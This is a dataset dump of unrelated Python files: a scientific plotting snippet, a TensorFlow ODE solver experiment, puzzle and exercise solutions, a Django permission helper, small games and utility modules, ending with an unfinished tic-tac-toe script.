# extra credit: Make schools in bottom 10 percent GHG Intensity show in red.
# NOTE(review): column -4 is assumed to be GHG Intensity; confirm against
# the header printed above.
ghg_intensity = []
lowest_intensity = []
color = []
for intensity in valid_data:
    ghg_intensity.append(float(intensity[-4]))
ghg_intensity.sort()
lowest_intensity.append(ghg_intensity[:3])
print(lowest_intensity[0])
# Color the three lowest-intensity schools red, the rest green.
for intensity in valid_data:
    if lowest_intensity[0][2] >= float(intensity[-4]):
        color.append("red")
    else:
        color.append("green")
plt.figure(1, tight_layout=True)
plt.scatter(sqft, ghg, alpha=0.3, c=color)
plt.show()
| true |
6dbe60c72d7495e4fedc5daa877f280a2b02b25e | Python | sWizad/diffeqsolver | /main5.py | UTF-8 | 8,668 | 3.0625 | 3 | [] | no_license | """ NN to solve 1st order ODE problems
based on Rosenbrock Euler method
"""
# Import the required modules
from __future__ import division
import numpy as np
import os, sys
import matplotlib.pyplot as plt
import tensorflow as tf
from utils import colored_hook
# tf.enable_eager_execution()
# This makes the plots appear inside the notebook
from scipy.integrate import odeint
# Define a function which calculates the derivative
def func(y, x):
    """Right-hand side f(y, x) of the test ODE dy/dx = x - y.

    The commented alternatives below are other test equations used during
    experimentation.
    """
    return x - y
    #return -.5*y
    #return x -.7*y*y
    #return 1.01-y*y
# Discretize x in [0, 5] into n points; dt is the uniform step size.
n = 20
xs = np.linspace(0.0,5,n)
dt = 5/(n-1)
y0 = 1.0 # the initial condition
# scipy solver
ys = odeint(func, y0, xs)
y_scipy = np.array(ys).flatten()
# (forward) Euler's Method
y_euler = np.zeros(np.shape(xs))
y_euler[0] = y0
#y_euler2 = np.zeros(np.shape(xs))
#y_euler2[0] = y0
for i in range(1,n):
    x = xs[i-1]
    y = y_euler[i-1]
    # Explicit Euler update: y_{i} = y_{i-1} + dt * f(y_{i-1}, x_{i-1}).
    y_euler[i] = y + dt*func(y,x)
    #y = y_euler2[i-1]
    #y_euler2[i] = y + np.exp(np.log(dt)+np.log(np.maximum( func(y,x),1e-7)))
    #y_euler2[i] -= np.exp(np.log(dt)+np.log(np.maximum(-func(y,x),1e-7)))
def _build_solver( x, reuse=False):
    """Build (or reuse) the TF1 graph of the learned one-step ODE solver.

    Args:
        x: placeholder/tensor of shape [batch, 4] holding (y_n, x_n, f_n, dt).
        reuse: when True, share the variables of a previously built solver.

    Returns:
        Tensor with the predicted next state y_{n+1}.
    """
    with tf.variable_scope('solver') as scope:
        if reuse:
            scope.reuse_variables()
        nin = x.get_shape()[-1].value
        # Layer 1: affine map followed by log(relu(.)) with a floor of 1e-9
        # to keep the log finite.
        with tf.variable_scope('1log-Relu'):
            nh1 = 1
            scale_int = np.zeros((nin,nh1))
            #scale_int[0][0] = 1.0
            #scale_int[2][1] = 1.0
            #scale_int[2][2] = -1.0
            #scale_int[3][3] = 1.0
            w1 = tf.get_variable("w1", [nin, nh1], initializer=tf.constant_initializer(scale_int), trainable=True)
            b1 = tf.get_variable("b1", [nh1], initializer=tf.constant_initializer(-1.0), trainable=True)
            h1 = tf.matmul(x, w1)+b1
            h1 = tf.math.log(tf.math.maximum(tf.nn.relu( h1 ),1e-9), name = 'h1')
        # Layer 2: affine map on [h1, x], clipped at 10 before exp to avoid
        # overflow.
        with tf.variable_scope('2expo'):
            nh2 = 2
            scale_int = np.zeros((nh1+nin,nh2))
            scale_int[1][0] = 1.0
            #scale_int[3][0] = 1.0
            scale_int[2][1] = 1.0
            #scale_int[3][1] = 1.0
            #scale_int[0][2] = 1.0
            #scale_int[0][3] = -1.0
            w2 = tf.get_variable("w2", [nh1+nin, nh2], initializer=tf.constant_initializer(scale_int), trainable=True)
            b2 = tf.get_variable("b2", [nh2], initializer=tf.constant_initializer(0.0), trainable=True)
            pp = tf.concat([h1,x],1)
            h2 = tf.math.minimum(tf.matmul(pp, w2)+b2,10)
            h2 = tf.math.exp( h2, name='h2')
        # Layer 3: final affine map producing the scalar h3 used by the model.
        with tf.variable_scope('3final'):
            nh3 = 1
            scale_int = np.zeros((nh2+nin,nh3))
            w3 = tf.get_variable("w3", [nh2+nin, 1], initializer=tf.constant_initializer(scale_int), trainable=True)
            b3 = tf.get_variable("b3", [1], initializer=tf.constant_initializer(1.0), trainable=True)
            pp = tf.concat([h2,x],1)
            h3 = tf.add(tf.matmul(pp, w3), b3, name='h3')
            #h3=h1
        # Model 1 combines the learned h3 with (y_n, f_n, dt) in a
        # Rosenbrock-Euler-style update; Model 2 is a simpler alternative.
        with tf.variable_scope('4model'):
            # Model 1
            z = tf.math.exp(h3*x[:,3])*(x[:,0]+x[:,3]*(x[:,2]-h3*x[:,0]))
            # Model 2
            #z = x[:,0]+x[:,3]*(x[:,2]+h3*x[:,3])
        return z
def fun2():
    """Build the solver graph, train it on random (y, x, dt) samples, then
    compare full-step and two-half-step predictions over the grid xs.

    NOTE(review): the local name `input` shadows the builtin; kept as-is.
    """
    input_layer = tf.placeholder('float32', shape=[None, 4], name = "input")
    # Unpack the 4 feature columns: y_n, x_n, f(y_n, x_n), dt.
    yn0, x0, fn0, dx = input_layer[:, 0], input_layer[:, 1], input_layer[:, 2], input_layer[:, 3]
    # One full step of size dx.
    with tf.variable_scope('Step-y1'):
        yn1 = _build_solver(input_layer)
        yn1 = yn1[:,0]
        fn1 = func(yn1,x0+1.0*dx)
        #print("Hey")
    # with tf.variable_scope('Step-y05'):
    # Two half steps of size dx/2 reusing the same solver variables.
    g05 = tf.stack([yn0,x0,fn0,dx/2],axis=1)
    yn05 = _build_solver(g05, reuse = True)
    yn05 = yn05[:,0]
    fn05= func(yn05,x0+0.5*dx)
    # with tf.variable_scope('Step-y10'):
    g10 = tf.stack([yn05,x0+0.5*dx,fn05,dx/2],axis=1)
    yn10 = _build_solver(g10, reuse = True)
    yn10 = yn10[:,0]
    fn10= func(yn10,x0+1.0*dx)
    #g15 = tf.stack([yn1[:,0],x0+dx,fn1[:,0],dx/2],axis=1)
    #yn15 = _build_solver(g15, reuse = True)
    #fn15= func(yn15,x0+1.5*dx)
    #g20 = tf.stack([yn1[:,0],x0+1.0*dx,fn1[:,0],dx],axis=1)
    #yn20 = _build_solver(g20, reuse = True)
    #fn20= func(yn20,x0+2.0*dx)
    # Loss: consistency between the full step and the two half steps
    # (step-doubling); the forward-Euler term is weighted 0 (disabled).
    with tf.variable_scope('loss'):
        ode_loss = 0.00*tf.reduce_mean(tf.square(yn1 -yn0 -dx*fn0)) # forward Euler
        ode_loss += tf.reduce_mean(tf.square(yn1 -yn10))
        #ode_loss += tf.reduce_mean(tf.square(yn1 - yn0-dx*(fn0+fn1)/2)) # backward Euler
        #ode_loss = tf.reduce_mean(tf.square(yn1 - yn0-dx*(fn0+2*fn05+fn1)/4)) #1/2 Simpson
        #ode_loss += tf.reduce_mean(tf.square(yn1 - yn0-dx*(fn0+4*fn05+fn10)/6)) #1/3 Simpson
        #ode_loss = tf.reduce_mean(tf.square(yn20 - yn0-dx*(fn0+4*fn05+2*fn1+4*fn15+fn20)/6)) #1/3 Simpson
        #ode_loss = tf.reduce_mean(tf.square(yn20-4/3*yn1 +1/3*yn0-dx*(fn20)*2/3)) #BDF2
        err_est = tf.reduce_mean(tf.square(yn1-yn10))
    learn_rate = 0.001
    optimizer = tf.train.AdamOptimizer(learn_rate).minimize(ode_loss)
    init = tf.global_variables_initializer()
    sess = tf.Session()
    sess.run(init)
    writer = tf.summary.FileWriter("log")
    writer.add_graph(sess.graph)
    summary = tf.summary.merge([
        tf.summary.scalar("loss", ode_loss)])
    print("Train Step")
    batch_size = 1000
    hm_epochs = 10001
    # Train on randomly sampled states around shifting centers.
    for index in range(hm_epochs):
        y_center = np.random.rand(1)[0]*2
        x_center = np.random.rand()*6
        dt_center = np.random.rand(1)[0]*dt#*0.5
        input = []
        x = 0.1
        for i in range(batch_size):
            y = np.random.randn()/2 + y_center
            x = np.random.randn() + x_center
            dt_train = max(np.random.rand()*dt/2+dt_center,1e-10)
            input.append([y,x,func(y,x),dt_train])
        _,lloss = sess.run([optimizer,ode_loss],feed_dict={input_layer:input})
        #lloss = sess.run(ode_loss,feed_dict={input_layer:input})
        summ = sess.run(summary, feed_dict={input_layer:input})
        writer.add_summary(summ,index)
        if index%200==0:
            print(index, lloss)
    print("Test Step")
    # Roll the learned solver across the grid: y_nn uses one full step per
    # grid interval, y_nn2 uses two half steps.
    x = 0.1
    y_nn= np.zeros(np.shape(xs))
    y_nn[0] = y0
    y_nn2= np.zeros(np.shape(xs))
    y_nn2[0] = y0
    y = y0
    lloss = 0.0
    dt_train = dt
    for i in range(1,n):
        y = y_nn[i-1]
        input = [[y,x,func(y,x),dt_train]]
        ynn,loss = sess.run([yn1,ode_loss],feed_dict={input_layer:input})
        y_nn[i] = ynn[0]
        y = y_nn2[i-1]
        input = [[y,x,func(y,x),dt_train/2]]
        ynn,loss = sess.run([yn10,ode_loss],feed_dict={input_layer:input})
        input = [[ynn,x+dt_train/2,func(ynn,x+dt_train/2),dt_train/2]]
        ynn2,loss = sess.run([yn10,ode_loss],feed_dict={input_layer:input})
        y_nn2[i] = ynn2[0]
        x += dt_train
        print(i,"Err",loss)
        lloss += loss
#print('Test Step:', lloss)
# Plot the numerical solution
#plt.rcParams.update({'font.size': 14}) # increase the font size
#plt.xlabel("x")
#plt.ylabel("y")
#y_exact = xs - 1 + 2*np.exp(-xs)
#plt.plot(xs, y_scipy);
#plt.plot(xs, y_euler, ".");
#plt.plot(xs, y_nn, "+");
#plt.plot(xs, y_nn2, "+");
#plt.show()
def recur(y,x,dt,err_max=1e-4):
    """Adaptive step: accept the solver's dt-step if its step-doubling error
    estimate is below err_max, otherwise recurse on two half steps.

    NOTE(review): relies on `sess`, `yn10`, `err_est`, `input_layer` and
    `dt_train`, which are locals of fun2() -- as written this function can
    only work if fun2's body ran at module scope. Confirm intended structure.
    """
    input = [[y,x,func(y,x),dt_train]]
    ynn,loss = sess.run([yn10,err_est],feed_dict={input_layer:input})
    # Accept when the error is small enough, or when dt has bottomed out.
    if loss<err_max or dt<5e-3:
        return ynn
    else:
        print("x=",x,", dt=",dt,", err =", loss)
        return recur(recur(y,x,dt/2,err_max),x+dt/2,dt/2,err_max)
print("Test loop")
x = 0.0
y_lp= np.zeros(np.shape(xs))
y_lp[0] = y0
y = y0
dt_train = dt
for i in range(1,n):
y = y_nn[i-1]
ynn = recur(y,x,dt,5e-6)
y_lp[i] = ynn[0]
x += dt_train
plt.figure()
ax = plt.subplot(2,1,1)
y_exact = xs - 1 + 2*np.exp(-xs)
plt.plot(xs,abs(y_exact-y_scipy))
plt.plot(xs,abs(y_exact-y_euler),"+")
plt.plot(xs,abs(y_exact-y_nn),".")
plt.plot(xs,abs(y_exact-y_nn2),".")
#plt.plot(xs,abs(y_exact-y_lp),"^")
print(abs(y_exact-y_lp))
ax = plt.subplot(2,1,2)
plt.plot(xs,y_scipy)
plt.plot(xs,y_euler,"+")
plt.plot(xs,y_nn,".")
plt.plot(xs,y_nn2,".")
#plt.plot(xs,y_lp,"^")
plt.show()
def main(arv):
    """Entry point invoked by tf.app.run(); `arv` (argv) is ignored."""
    fun2()
if __name__ == "__main__":
sys.excepthook = colored_hook(
os.path.dirname(os.path.realpath(__file__)))
tf.app.run()
#y_diff = np.abs(y_exact - y_scipy)
#plt.semilogy(xs, y_diff)
#plt.ylabel("Error")
#plt.xlabel("x")
#plt.title("Error in numerical integration");
# Note the logarithmic scale on the y-axis.
| true |
9dc55b66267bf64baac83be1e6d6f798c9d96468 | Python | redixhumayun/ctci | /HackerRank/projectEuler.py | UTF-8 | 1,448 | 3.421875 | 3 | [] | no_license | import unittest
import pdb
from fractions import Fraction
def findSumOfProducts(number):
    """Sum findMaxProduct(num) for every num from 5 up to *number* inclusive.

    The leftover `pdb.set_trace()` debugging breakpoint has been removed:
    it halted every loop iteration in an interactive debugger.
    """
    result = 0
    for num in range(5, number + 1):
        result += findMaxProduct(num)
    return result
def findMaxProduct(n):
    """Feed isTerminating the largest value of (n**d)/(d**d) over 1 <= d < n.

    The maximum is taken exactly using Fraction arithmetic; ties keep the
    first candidate, matching a strict `>` comparison.
    """
    best = max((Fraction(n ** d, d ** d) for d in range(1, n)), default=0)
    return isTerminating(best.numerator, best.denominator)
def isTerminating(num, den):
    """Return num/den, negated when the fraction's decimal expansion
    terminates (i.e. the denominator reduces to 1 after stripping all
    factors of 2 and 5)."""
    ratio = num / den
    reduced = den
    while reduced % 2 == 0:
        reduced /= 2
    while reduced % 5 == 0:
        reduced /= 5
    return -ratio if reduced == 1 else ratio
class TestProjectEuler(unittest.TestCase):
    """Unit tests for isTerminating / findMaxProduct / findSumOfProducts."""
    def setUp(self):
        pass
    def test_isTerminatingPos(self):
        # 2/3 does not terminate, so the value comes back positive.
        num = 2
        den = 3
        result = isTerminating(num, den)
        self.assertEqual(result, 0.6666666666666666)
    def test_isTerminatingNeg(self):
        # 5/2 terminates, so the value comes back negated.
        num = 5
        den = 2
        result = isTerminating(num, den)
        self.assertEqual(result, -2.5)
    def test_findMaxProduct(self):
        # For n=8 the maximum is 8**3/3**3 = 512/27, non-terminating.
        num = 8
        result = findMaxProduct(num)
        self.assertEqual(round(result, 9), 18.962962963)
    def test_findSumOfProducts(self):
        number = 100
        result = findSumOfProducts(number)
        self.assertEqual(result, 2438)
if __name__ == "__main__":
    unittest.main()
| true |
551d351319962976d1c5729157cc9c054385d368 | Python | Ro9ueAdmin/django-orchestra | /orchestra/permissions/options.py | UTF-8 | 3,550 | 3.0625 | 3 | [
"BSD-3-Clause"
] | permissive | import functools
import inspect
# WARNING: *MAGIC MODULE*
# This is not a safe place, lot of magic is happening here
class Permission(object):
    """
    Base class used for defining class and instance permissions.
    Enabling an ''intuitive'' interface for checking permissions:
        # Define permissions
        class NodePermission(Permission):
            def change(self, obj, cls, user):
                return obj.user == user
        # Provide permissions
        Node.has_permission = NodePermission()
        # Check class permission by passing it as string
        Node.has_permission(user, 'change')
        # Check class permission by calling it
        Node.has_permission.change(user)
        # Check instance permissions
        node = Node()
        node.has_permission(user, 'change')
        node.has_permission.change(user)
    """
    def __get__(self, obj, cls):
        """ Hacking object internals to provide means for the mentioned interface """
        # call interface: has_permission(user, 'perm')
        def call(user, perm):
            return getattr(self, perm)(obj, cls, user)
        # has_permission.perm(user)
        # NOTE(review): inspect.getmembers with predicate=inspect.ismethod on
        # a class only yields bound methods in Python 3 (e.g. those added by
        # _aggregate); plain functions on the class are skipped -- confirm
        # this matches the intended behavior after the 2->3 port.
        for func in inspect.getmembers(type(self), predicate=inspect.ismethod):
            if not isinstance(self, func[1].__self__.__class__):
                # aggregated methods
                setattr(call, func[0], functools.partial(func[1], obj, cls))
            else:
                # self methods
                setattr(call, func[0], functools.partial(func[1], self, obj, cls))
        return call
    def _aggregate(self, obj, cls, perm):
        """ Aggregates cls methods to self class"""
        # Copies every public method of `perm` onto this permission class.
        for method in inspect.getmembers(perm, predicate=inspect.ismethod):
            if not method[0].startswith('_'):
                setattr(type(self), method[0], method[1])
class ReadOnlyPermission(Permission):
    """Permission set that grants viewing and nothing else."""
    def view(self, obj, cls, user):
        # Viewing is unconditionally allowed for every user.
        return True
class AllowAllPermission(object):
    """Descriptor that answers True to every permission query."""
    class AllowAllWrapper(object):
        """Stand-in whose call and attribute interfaces always grant access."""
        def __call__(self, *args):
            # has_permission(user, 'perm') style check.
            return True
        def __getattr__(self, name):
            # has_permission.perm(user) style check.
            return lambda n: True
    def __get__(self, obj, cls):
        # Both class- and instance-level access yield the permissive wrapper.
        return self.AllowAllWrapper()
class RelatedPermission(Permission):
    """
    Inherit permissions of a related object
    The following example will inherit permissions from sliver_iface.sliver.slice
        SliverIfaces.has_permission = RelatedPermission('sliver.slices')
    """
    def __init__(self, relation):
        # Dotted attribute path from this model to the object whose
        # permissions should be used, e.g. 'sliver.slice'.
        self.relation = relation
    def __get__(self, obj, cls):
        """ Hacking object internals to provide means for the mentioned interface """
        # Walk through FK relations
        relations = self.relation.split('.')
        if obj is None:
            # Class-level access: follow the Django FK descriptors to the
            # related model class (.field.rel.to).
            parent = cls
            for relation in relations:
                parent = getattr(parent, relation).field.rel.to
        else:
            # Instance-level access: follow the attribute chain directly.
            parent = functools.reduce(getattr, relations, obj)
        # call interface: has_permission(user, 'perm')
        def call(user, perm):
            return parent.has_permission(user, perm)
        # method interface: has_permission.perm(user)
        for name, func in parent.has_permission.__dict__.items():
            if not name.startswith('_'):
                setattr(call, name, func)
        return call
| true |
42a2887dc16e67b1f43de510a505912a05a87061 | Python | Debdut24/Pong | /puddle.py | UTF-8 | 478 | 3.734375 | 4 | [] | no_license | from turtle import Turtle
class Puddle(Turtle):
    """A white paddle anchored at horizontal position *x*, movable vertically."""
    def __init__(self, x, y):
        super().__init__()
        self.x = x
        self.y = y
        self.color("white")
        self.shape("square")
        self.penup()
        # Stretch the 20x20 base square into a tall 100x20 paddle.
        self.shapesize(stretch_wid=5, stretch_len=1)
        self.goto(x, y)
    def move_up(self):
        """Shift the paddle 20 pixels upward."""
        self.goto(self.x, self.ycor() + 20)
    def move_down(self):
        """Shift the paddle 20 pixels downward."""
        self.goto(self.x, self.ycor() - 20)
782c4d867fe81a436f2dd6c061ee2bbd7f5f8eba | Python | purnima64/DS_Titanic | /basic_fun.py | UTF-8 | 2,280 | 3.6875 | 4 | [] | no_license | import numpy as np
import pandas as pd
def basic_df_exploration(df):
    """
    Provides basic data exploration details
    Params:
    -------
    df: pandas dataframe
    Returns:
    --------
    None
    Prints the following output:
    - Shape
    - Column name and respective types
    - Descriptive stats
    - Columns with null values and respective count
    - Outliers per column if any
    """
    print('\n====================BASIC EXPLORATION====================\n')
    # Printing rows and columns
    print('Dataframe has {} rows and {} columns\n'.format(str(df.shape[0]), str(df.shape[1])))
    # Printing column name and its respective dtypes
    print('Column names and its respective types')
    print('-------------------------------------\n')
    print(df.info())
    print('')
    # Printing Descriptive stats for numeric columns
    print('Descriptive stats for numeric columns')
    print('-------------------------------------\n')
    print(df.describe())
    print('')
    # Printing Descriptive stats for categorical columns
    # NOTE(review): describe(include='object') raises ValueError when the
    # frame has no object-typed columns -- confirm inputs always have some.
    print('Descriptive stats for categorical columns')
    print('-----------------------------------------\n')
    print(df.describe(include='object'))
    print('')
    # Printing column with null values
    print('Columns with null values and respective counts\n')
    print('----------------------------------------------\n')
    print(df.isnull().sum()[df.isnull().sum() > 0])
    print('')
    # Printing outliers for columns
    print('Checking for outliers in numeric columns')
    print('----------------------------------------')
    for c in df.select_dtypes(exclude='object').columns:
        print('Outliers in column {}:'.format(c))
        outliers = iqr_outliers(df[c])
        if outliers:
            print(set(outliers))
            print('')
        else:
            print('No outliers\n')
    print('\n====================DONE====================\n')
def iqr_outliers(arr):
    """Return the values of *arr* lying outside the Tukey 1.5*IQR fences."""
    q3 = np.nanpercentile(arr, 75)
    q1 = np.nanpercentile(arr, 25)
    spread = q3 - q1
    hi = q3 + 1.5 * spread
    lo = q1 - 1.5 * spread
    return [v for v in arr if v > hi or v < lo]
if __name__ == "__main__":
df = pd.read_csv('mall_data.txt')
basic_df_exploration(df) | true |
64769cc0532a2e48c4e607781a4cc342dbcf5d74 | Python | LCDG-tim/2020-exos | /arbres3.py | UTF-8 | 2,185 | 3.421875 | 3 | [] | no_license | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 24 15:37:37 2020
@author: timot
"""
class ABR:
    """Binary search tree node (arbre binaire de recherche).

    Values strictly smaller than `valeur` live in the left subtree; greater
    or equal values (duplicates included) live in the right subtree.
    Idiom fix: every `== None` / `self == None` comparison replaced with the
    canonical `is None` identity test (same behavior for nodes and None).
    """
    def __init__(self, val):
        self.valeur = val   # payload stored at this node
        self.gauche = None  # left subtree (smaller values)
        self.droite = None  # right subtree (greater-or-equal values)

    def inserer(self, x):
        """Insert *x* while preserving the BST ordering."""
        if x < self.valeur:
            if self.gauche is not None:  # descend while a left child exists
                self.gauche.inserer(x)
            else:
                self.gauche = ABR(x)
        else:
            if self.droite is not None:
                self.droite.inserer(x)
            else:
                self.droite = ABR(x)

    def affiche(self):
        """Return a nested-list view [valeur, gauche, droite] of the tree.

        Written so it can also be invoked as ABR.affiche(None) on an empty
        subtree, returning None.
        """
        if self is None:
            return None
        return [
            self.valeur, ABR.affiche(self.gauche), ABR.affiche(self.droite)
        ]

    def taille(self):
        """Return the number of nodes in the tree (0 for None)."""
        if self is None:
            return 0
        return 1 + ABR.taille(self.gauche) + ABR.taille(self.droite)

    def rechecher(self, val) -> bool:
        """Return True when *val* is present (method name kept for callers)."""
        ret_val = False
        if self.valeur > val:
            if self.gauche is not None:
                ret_val = self.gauche.rechecher(val)
        elif self.valeur < val:
            if self.droite is not None:
                ret_val = self.droite.rechecher(val)
        else:
            ret_val = True
        return ret_val

    def hauteur(self):
        """Return the height: edges on the longest root-to-leaf path."""
        if self is None:
            return 0
        if self.gauche is None and self.droite is None:
            return 0
        return 1 + max(ABR.hauteur(self.gauche), ABR.hauteur(self.droite))

    def getValeur(self):
        """Return the value stored at this node."""
        return self.valeur

    def mini(self):
        """Return the smallest value (leftmost node)."""
        if self.gauche is None:
            return self.valeur
        return self.gauche.mini()

    def maxi(self):
        """Return the largest value (rightmost node)."""
        if self.droite is None:
            return self.valeur
        return self.droite.maxi()
def listeEnArbre(l: list):
    """Build an ABR from the values of *l*; the first element becomes the root."""
    racine = ABR(l[0])
    for valeur in l[1:]:
        racine.inserer(valeur)
    return racine
if __name__ == "__main__":
a = listeEnArbre([45,245,185,15,6,165,15,456,465,46,451,56,16,446]) | true |
ccbdfe9e20b716053ce7e286dc1b4f060a9b40a4 | Python | aspcodenet/IotListLabbar | /IotListLabbar/Lab1.py | UTF-8 | 199 | 3.59375 | 4 | [] | no_license |
lista = []
for i in range(0,4):
lista.append(int(input(f"Mata in tal {i+1}:")))
largestSoFar = lista[0]
for i in lista:
if i > largestSoFar:
largestSoFar = i
print(largestSoFar)
| true |
3e3c620aa3287ba9266d0eb61a0d92a45c0e7e5a | Python | runzezhang/Code-NoteBook | /lintcode/1243-number-of-segments-in-a-string.py | UTF-8 | 1,475 | 3.828125 | 4 | [
"Apache-2.0"
] | permissive | Description
中文
English
Count the number of segments in a string, where a segment is defined to be a contiguous sequence of non-space characters.
the string does not contain any non-printable characters.
Have you met this question in a real interview?
Example
Example:
Input: "Hello, my name is John"
Output: 5
Explanation: There are five segments: "Hello", "my", "name", "is", "John".
class Solution:
    """
    @param s: a string
    @return: the number of segments in a string
    """
    def countSegments(self, s):
        # split() with no argument collapses runs of whitespace, so every
        # resulting item is exactly one segment.
        segments = s.split()
        return len(segments)
# 本参考程序来自九章算法,由 @九章算法助教团队 提供。版权所有,转发请注明出处。
# - 九章算法致力于帮助更多中国人找到好的工作,教师团队均来自硅谷和国内的一线大公司在职工程师。
# - 现有的面试培训课程包括:九章算法班,系统设计班,算法强化班,Java入门与基础算法班,Android 项目实战班,
# - Big Data 项目实战班,算法面试高频题班, 动态规划专题班
# - 更多详情请见官方网站:http://www.jiuzhang.com/?source=code
class Solution:
    """
    @param s: a string
    @return: the number of segments in a string
    """
    def countSegments(self, s):
        # A character starts a segment when it is not a space and the
        # previous character was a space (or it is the first character).
        count = 0
        previous = ' '
        for ch in s:
            if ch != ' ' and previous == ' ':
                count += 1
            previous = ch
        return count
37e9c844ce04a3c8f7af90584a1609da00787292 | Python | kdungs/adventofcode | /2021/05.py | UTF-8 | 1,434 | 3.78125 | 4 | [] | no_license | #!/usr/bin/env python3
from collections import defaultdict
# Advent of Code 2021 day 5: count grid points covered by 2+ vent lines.
with open("data/05.txt") as f:
    lines = f.readlines()
# Part 1: consider only horizontal and vertical lines.
points = defaultdict(int)
for line in lines:
    left, right = line.split(" -> ")
    x1, y1 = map(int, left.split(","))
    x2, y2 = map(int, right.split(","))
    if x1 != x2 and y1 != y2:
        # not a horizontal or vertical line
        continue
    # For axis-aligned lines one of the ranges is a single value, so this
    # nested loop marks exactly the cells on the segment.
    for x in range(min(x1, x2), max(x1, x2) + 1):
        for y in range(min(y1, y2), max(y1, y2) + 1):
            points[(x, y)] += 1
intersections = sum(v > 1 for v in points.values())
print(intersections)
# Part 2
points = defaultdict(int)
for line in lines:
    left, right = line.split(" -> ")
    x1, y1 = map(int, left.split(","))
    x2, y2 = map(int, right.split(","))
    if x1 == x2:
        # Vertical
        x = x1
        for y in range(min(y1, y2), max(y1, y2) + 1):
            points[(x, y)] += 1
    elif y1 == y2:
        # Horizontal
        y = y1
        for x in range(min(x1, x2), max(x1, x2) + 1):
            points[(x, y)] += 1
    else:
        # Diagonal (by definition)
        # Verify!
        dx = x2 - x1
        dy = y2 - y1
        assert(abs(dy / dx) == 1)
        # Unit steps (+/-1 as floats); float keys hash equal to int keys,
        # so they land in the same dict cells as part-1 coordinates.
        sx = dx / abs(dx)
        sy = dy / abs(dy)
        for i in range(abs(dx) + 1):
            x = x1 + sx * i
            y = y1 + sy * i
            points[(x, y)] += 1
intersections = sum(v > 1 for v in points.values())
print(intersections)
| true |
ceb98003f824c3a85ed547bbbc63f7a47354fdde | Python | javierwilson/commcare-hq | /corehq/blobs/tests/util.py | UTF-8 | 940 | 2.609375 | 3 | [] | no_license | from shutil import rmtree
from tempfile import mkdtemp
import corehq.blobs as blobs
from corehq.blobs.fsdb import FilesystemBlobDB
class TemporaryFilesystemBlobDB(FilesystemBlobDB):
    """Create temporary blob db and install as global blob db

    Global blob DB can be retrieved with `corehq.blobs.get_blob_db()`
    """
    def __init__(self):
        rootdir = mkdtemp(prefix="blobdb")
        super(TemporaryFilesystemBlobDB, self).__init__(rootdir)
        blobs._db.append(self)
        try:
            # verify get_blob_db() returns our new db
            assert blobs.get_blob_db() is self, 'got wrong blob db'
        except BaseException:
            # Catch everything (including AssertionError and KeyboardInterrupt)
            # so a failed construction rolls back the global registration and
            # temp dir; the re-raise preserves the original traceback. A bare
            # `except:` did the same but trips linters.
            self.close()
            raise
    def close(self):
        """Uninstall this db from the global registry and delete its files."""
        try:
            blobs._db.remove(self)
        finally:
            # Always reclaim the temp directory, even if removal failed.
            rmtree(self.rootdir)
            self.rootdir = None
    def __enter__(self):
        return self
    def __exit__(self, *exc_info):
        self.close()
| true |
03c879bb46dee0e3eba046547eae73819ecf1ae1 | Python | ChidinmaKO/Chobe-Py-Challenges | /bites/bite155.py | UTF-8 | 1,397 | 3.828125 | 4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | import re
import shlex
def split_words_and_quoted_text(text):
    """Split *text* on spaces, keeping double-quoted runs together.

    'Should give "3 elements only"' -> ['Should', 'give', '3 elements only']
    The surrounding quotes are stripped from quoted chunks.
    """
    # Match either a word run (with trailing whitespace) or a whole
    # double-quoted chunk, then normalize each piece.
    pieces = re.findall(r'\w+\s*|\".+?\"', text)
    return [piece.strip().replace('"', '') for piece in pieces]
# tests
import pytest
from split import split_words_and_quoted_text
# Inputs paired index-by-index with their expected outputs below.
some_strings = (
    'Should give "3 words only"',
    'Our first program was "Hello PyBites"',
    'Because "Hello World" is really cliche',
    ('PyBites is a "A Community that Masters '
     'Python through Code Challenges"')
)
expected_returns = (
    ['Should', 'give', '3 words only'],
    ['Our', 'first', 'program', 'was', 'Hello PyBites'],
    ['Because', 'Hello World', 'is', 'really', 'cliche'],
    ['PyBites', 'is', 'a', ('A Community that Masters Python '
                            'through Code Challenges')]
)
# One parametrized case per (input, expected) pair.
@pytest.mark.parametrize("arg, ret",
                         zip(some_strings, expected_returns))
def test_split_words_and_quoted_text(arg, ret):
    assert split_words_and_quoted_text(arg) == ret
83339f9e2e2f9ab76f41bd75814dd4b58b599d38 | Python | fernandochimi/python-data-analysis | /python_data_analysis/chapter_03/03-linear-algebra.py | UTF-8 | 221 | 3.078125 | 3 | [] | no_license | # coding: utf-8
import numpy as np
# Demonstrate matrix inversion (Python 2 script).
A = np.mat("2 4 6; 4 2 6; 10 -4 18")
print "A\n", A
inverse = np.linalg.inv(A)
print "Inverse of A\n", inverse
# A * A^-1 should be the identity; the difference shows numerical error.
print "Check\n", A * inverse
print "Error\n", A * inverse - np.eye(3)
| true |
c0d48ae35700a9bf4baf94fa1e6b3f32030fbfc0 | Python | maxdatascience/tic-tac-toe | /tic-tac-toe.py | UTF-8 | 3,270 | 4.1875 | 4 | [] | no_license | import random
def display_board(board):
    """Scroll the console clear, then draw the 3x3 board (cells 1-9).

    Cells 7-9 are the top row, 1-3 the bottom, mimicking a numeric keypad.
    """
    print('\n' * 100)
    divider = "-------------"
    for row_start in (7, 4, 1):
        a, b, c = board[row_start:row_start + 3]
        print(f"| {a} | {b} | {c} |")
        if row_start != 1:
            print(divider)
def player_input():
    """
    OUTPUT = (Player 1 marker, Player 2 marker)
    """
    choice = ''
    # Keep prompting until the player types X or O (case-insensitive).
    while choice not in ('X', 'O'):
        choice = input('Player1: Choose X or O: ').upper()
    return ('X', 'O') if choice == 'X' else ('O', 'X')
def win_sequence(list, marker):
    # True when the three extracted board cells equal the [mark, mark, mark]
    # triple. NOTE(review): `list` shadows the builtin; kept to preserve the
    # public signature.
    return list == marker
def place_marker(board, marker, position):
    # Write the player's marker ('X' or 'O') into cell 1-9, mutating board.
    board[position] = marker
def win_check(board, mark):
    """Return True when *mark* fills any row, column, or diagonal."""
    target = [mark] * 3
    lines = (
        board[1:4], board[4:7], board[7:10],        # rows
        board[1:8:3], board[2:9:3], board[3:10:3],  # columns
        board[1:10:4], board[3:8:2],                # diagonals (1-5-9, 3-5-7)
    )
    return any(line == target for line in lines)
def choose_first():
    """Coin flip for the opening move: 0 -> player 1 starts, 1 -> player 2."""
    return random.randint(0, 1)
def space_check(board, position):
    # A cell is free while it still holds the blank placeholder.
    return board[position] == ' '
def full_board_check(board):
    """Return True when all nine playable cells hold a marker."""
